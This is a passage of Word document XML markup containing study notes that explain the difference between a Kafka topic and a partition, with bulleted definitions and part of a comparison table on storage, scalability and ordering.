          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>difference between a topic and a partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114FABD1" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC" w:rsidP="009964FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Topic in Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387F3BA1" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>topic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Kafka is a logical channel to which producers write data and from which consumers read data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041F6D01" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka topics allow messages to be categorized and managed. It is essentially a stream of records that you can publish to and consume from.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A566DA" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Topics are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multi-producer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multi-consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning multiple producers can write data to the same topic, and multiple consumers can read data from it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18678879" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Topics are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>named entities</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Kafka and serve as a logical grouping for messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EB442D" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In Kafka, when you send a message, you specify a topic name, and Kafka brokers handle the distribution of these messages to the appropriate partitions under the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA3515C" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC" w:rsidP="009964FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Partition in Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0674F631" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="239"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>subdivision</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a Kafka topic. Each topic is divided into partitions for scalability and parallelism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50155904" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="239"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Partitions allow Kafka to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distribute data</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> across multiple brokers in a Kafka cluster and enable </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallel processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E04D687" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="239"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kafka ensures that each partition is an ordered, immutable sequence of records, and each record within a partition is assigned a unique </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA6DE58" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="239"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Each partition can reside on different Kafka brokers in the cluster, enabling </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>horizontal scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EACC5FC" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="239"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A partition also allows Kafka to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distribute work</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> among consumers. Each consumer within a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> reads from one or more partitions, ensuring that records are processed in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753443AA" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC" w:rsidP="009964FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Differences between Topic and Partition in Kafk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4"/>
        <w:gridCol w:w="4517"/>
        <w:gridCol w:w="4233"/>
      </w:tblGrid>
      <w:tr w:rsidR="009964FC" w:rsidRPr="00CE4B95" w14:paraId="607C8947" w14:textId="77777777" w:rsidTr="009964FC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7114B8FB" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC" w:rsidP="002A038A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43096880" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC" w:rsidP="002A038A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Topic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AFABEF4" w14:textId="77777777" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC" w:rsidP="002A038A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009964FC" w:rsidRPr="00CE4B95" w14:paraId="5E041740" w14:textId="77777777" w:rsidTr="009964FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24AB658D"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E639642"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>A topic is a logical name or category for messages. It is the channel to which producers write and consumers read.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D88391F"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>A partition is a physical subdivision of a topic where data is distributed for scalability.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009964FC" w:rsidRPr="00CE4B95" w14:paraId="1B1568DD" w14:textId="77777777" w:rsidTr="009964FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DFCECE8"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Data Storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B196762"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>A topic stores the logical grouping of data. It doesn’t physically store the data itself but organizes messages.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="289FF20B"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>A partition is where data for a topic is physically stored. Data is divided into partitions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009964FC" w:rsidRPr="00CE4B95" w14:paraId="39F9E0B0" w14:textId="77777777" w:rsidTr="009964FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F64AA19"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Scalability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73DE4351"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Topics provide a way to group data logically. Scaling is achieved by adding more partitions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30C96A25"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Partitions enable horizontal scalability by distributing data across multiple brokers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009964FC" w:rsidRPr="00CE4B95" w14:paraId="071E1003" w14:textId="77777777" w:rsidTr="009964FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="422D9235"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Ordering Guarantees</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="694EE606"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Ordering is guaranteed only within a partition, not across partitions of a topic.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12DB6E2B"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Data in each partition is strictly ordered. The order of messages in different partitions is not guaranteed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009964FC" w:rsidRPr="00CE4B95" w14:paraId="7F72FA7E" w14:textId="77777777" w:rsidTr="009964FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
